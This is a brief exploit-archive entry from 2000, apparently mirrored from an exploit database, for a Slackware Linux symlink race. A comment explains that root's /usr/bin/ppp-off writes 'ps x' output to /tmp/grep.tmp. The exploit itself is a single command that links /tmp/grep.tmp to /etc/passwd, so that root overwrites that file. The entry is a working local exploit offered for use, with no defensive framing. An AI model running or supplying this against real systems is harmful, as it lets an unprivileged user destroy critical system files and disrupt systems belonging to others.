[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit
# Published : 2000-11-17
# Author : sinfony
# Previous Title : HP-UX 11.00/10.20 crontab Overwrite Files Exploit
# Next Title : Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability


#!/bin/sh
#
# In SlackWare Linux the script /usr/bin/ppp-off writes the
# output of 'ps x' to /tmp/grep.tmp. Since root is the user
# that runs ppp-off,  a non-privileged  user could create a
# link from /tmp/grep.tmp to any file(ie: /etc/issue), thus
# when root runs the  ppp-off script, the  output of 'ps x'
# would be put in the linked file. 
#                                                   sinfony

ln -s /etc/passwd /tmp/grep.tmp


# www.Syue.com [2000-11-17]